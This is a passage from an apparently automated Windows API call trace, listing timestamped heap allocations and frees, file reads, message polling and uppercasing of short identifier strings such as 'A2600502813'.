lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0208.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ee020 [0208.742] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0208.742] ReadFile (in: hFile=0x524, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x462f, lpOverlapped=0x0) returned 1 [0208.744] ReadFile (in: hFile=0x524, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0208.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0208.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x462f) returned 0x2a9a940 [0208.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ee020 | out: hHeap=0x2af0000) returned 1 [0208.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0208.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0208.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0208.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0208.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x462f) returned 0x2a9ef78 [0208.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a940 | out: hHeap=0x2af0000) returned 1 [0208.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.747] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0208.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0208.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x462f) returned 0x2a9a940 [0208.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a940 | out: hHeap=0x2af0000) returned 1 [0208.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.748] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0208.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0208.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0208.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0208.748] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0208.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0208.748] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0208.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0208.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x462f) returned 0x2a9a940 [0208.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0208.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0208.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5e8 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0208.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0208.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x462f) returned 0x2aae878 [0208.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0208.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0208.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0208.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0208.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0208.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0208.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0208.752] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0208.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0208.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0208.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0208.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0208.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0208.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0208.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0208.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0208.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0208.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0208.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0208.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0208.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0208.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0208.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0208.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0208.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0208.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0208.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0208.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0208.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0208.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0208.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0208.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0208.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0208.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0208.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0208.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0208.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0208.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0208.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0208.755] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0208.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9a8 [0208.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0208.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0208.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0208.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0208.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0208.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0208.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0208.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0208.756] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: 